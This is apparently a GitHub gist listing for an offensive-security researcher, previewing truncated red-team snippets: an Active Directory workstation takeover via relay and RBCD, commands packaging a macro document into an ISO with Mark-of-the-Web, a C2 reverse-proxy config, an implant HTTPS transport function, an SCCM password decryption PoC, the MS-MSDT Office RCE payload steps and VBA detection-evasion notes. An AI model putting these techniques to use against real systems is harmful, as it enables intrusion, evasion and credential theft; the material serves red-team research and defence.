Skip to content

Instantly share code, notes, and snippets.

View mgeeky's full-sized avatar
💭
Wanna sip a sencha?

Mariusz Banach mgeeky

💭
Wanna sip a sencha?
2.3k followers · 95 following
  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
View GitHub Profile
@mgeeky
mgeeky / Workstation-Takeover.md
Created September 15, 2022 20:26 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@mgeeky
mgeeky / gist:82d6abe0508ae81f107689864fb5dfc0
Created September 6, 2022 12:09
office-to-iso-with-motw.txt
# Pack macro-enabled doc to ISO
py PackMyPayload.py Resume1337.xlsm test11.iso
# Apply MOTW on that ISO
Set-Content -Path test11.iso -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'
# Mount it
Mount-DiskImage -ImagePath test11.iso
@mgeeky
mgeeky / AMSITools.psm1
Created August 5, 2022 13:05 — forked from mgraeber-rc/AMSITools.psm1
Get-AMSIEvent and Send-AmsiContent are helper functions used to validate AMSI ETW events. Note: because this script contains the word AMSI, it will flag most AV engines. Add an exception on a test system accordingly in order to get this to work.
filter Send-AmsiContent {
<#
.SYNOPSIS
Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider.
Author: Matt Graeber
Company: Red Canary
.DESCRIPTION
@mgeeky
mgeeky / Caddyfile
Created August 1, 2022 19:16 — forked from byt3bl33d3r/Caddyfile
Caddyfile reverse proxy example for C2 platforms
{
# This instructs Caddy to hit the LetsEncrypt staging endpoint, in production you should remove this.
acme_ca https://acme-staging-v02.api.letsencrypt.org/directory
}
(proxy_upstream) {
# Enable access logging to STDOUT
log
# This is our list of naughty client User Agents that we don't want accessing our C2
@mgeeky
mgeeky / transport_https.c
Created July 11, 2022 21:24 — forked from Cracked5pider/transport_https.c
perform HTTPs requests using WinHTTP
BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize )
{
#ifdef TRANSPORT_HTTP
HANDLE hConnect = NULL;
HANDLE hSession = NULL;
HANDLE hRequest = NULL;
DWORD HttpFlags = 0;
LPVOID RespBuffer = NULL;
@mgeeky
mgeeky / howToModifyOvaFile.md
Created July 5, 2022 21:00 — forked from afdevries/howToModifyOvaFile.md
how to modify .ova file on linux/Mac using terminal....export vm (OVF 1.0) from virtualbox, then modify some tag and hash value for import vm to ESXi

extract ova files from an archive

$ tar -xvf vmName.ova

modify ovf for some invalid tag

$ vi vmName.ovf
@mgeeky
mgeeky / sccmdecryptpoc.cs
Created July 3, 2022 20:01 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program
@mgeeky
mgeeky / TlsCallback.cpp
Created June 14, 2022 18:58
TLS Callbacks demo in Windows GUI application, to be compiled with MSVC++. Originally authored by Elias Bachaalany, source: http://lallouslab.net/2017/05/30/using-cc-tls-callbacks-in-visual-studio-with-your-32-or-64bits-programs/
#define WIN32_LEAN_AND_MEAN
#include <iostream>
#include <windows.h>
VOID WINAPI TlsCallback1(PVOID DllHandle, DWORD Reason, PVOID Reserved)
{
if (Reason == DLL_PROCESS_ATTACH)
{
MessageBoxA(NULL, "Hello from TlsCallback1", "TlsCallback1", 0);
@mgeeky
mgeeky / ms-msdt.MD
Created May 31, 2022 07:46 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@mgeeky
mgeeky / README.md
Created May 20, 2022 16:38
Call WinAPI dynamically from VBA using oleaut32.DispCallFunc to minimize number of Declare PtrSafe import statements

Synopsis

This PoC is currently not working properly.

The PoC demonstrates how to dynamically call WinAPI imported functions from VBA using oleaut32!DispCallFunc(...).

The idea is to get rid of most of the Private Declare PtrSafe Function SomeFunction Lib "kernel32.dll" Alias "Sleep" ( ... ) statements, revealing intent of a dodgy VBA code.

From the offensive perspective we'd prefer to have the least amount of WinAPI import statements in our VBA to lower detection rate on the security aware scanners.